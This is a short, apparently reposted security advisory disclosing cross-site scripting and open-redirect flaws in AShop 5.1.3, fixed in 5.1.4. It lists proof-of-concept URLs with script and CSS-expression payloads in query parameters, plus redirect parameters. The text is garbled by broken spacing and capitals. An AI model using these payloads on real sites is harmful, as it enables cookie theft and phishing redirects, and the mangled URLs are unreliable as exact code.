Title: Multiple security vulnerabilities in AShop
By Stefan Schurtz www.2cto.com security (at) infoserve (dot) de [email concealed]
Impact software: Successfully tested on AShop513
Developer Website: http://www.ashopsoftware.com/
Current status: Version 5.1.4 fixed
======================================
Defect description:
======================================
AShop has multiple security defects
============================
Example
============================
Cross-Site-Scripting
IE8
Http://www.bkjia.com/ashop /? '"<Script> alert (document. cookie) </script>
Http://www.bkjia.com/ashop/index. php? '"<Script> alert (document. cookie) </script
>
Http://www.bkjia.com/ashop/picture. php? Picture = "stYle = x: expre/**/ssion (alert (document. cookie) ns ="
Http://www.bkjia.com/ashop/index. php? Language = '"<script> alert (document. cookie
) </Script>
FF 1, 7.1
Http://www.bkjia.com/ashop/index. php? Searchstring = 1 & showresult = true & exp = '"</s
Alert> <script> alert (666); </script> & resultpage = & categories = off & msg = & searc
H = index. php & shop = 1
Http://www.bkjia.com/ashop/catalogue. php? Cat = 3 & exp = 3 & shop = 3 & resultpage = '"</SC
Ript> <script> alert (document. cookie) </script> & msg =
Http://www.bkjia.com/ashop/catalogue. php? Cat = 3 & exp = 3 & shop = 3 & resultpage = 1 & msg =
'"</Script> <script> alert (document. cookie) </script>
Http://www.bkjia.com/ashop/basket. php? Cat = 0 & sid = '"</script> <script> alert (docu
Ment. cookie) </script> & shop = 1 & payoption = 3
Open Redirection
Http://www.bkjia.com/ashop/language. php? Language = sv & redirect = http://www.googl
E.com
Http://www.bkjia.com/ashop/currency. php? Currency = aud & redirect = http://www.goog
Le.com
Http://www.bkjia.com/ashop/currency. php? Redirect = http://www.google.com
==========
Solution:
==========
Upgrade to the latest version 5.1.4.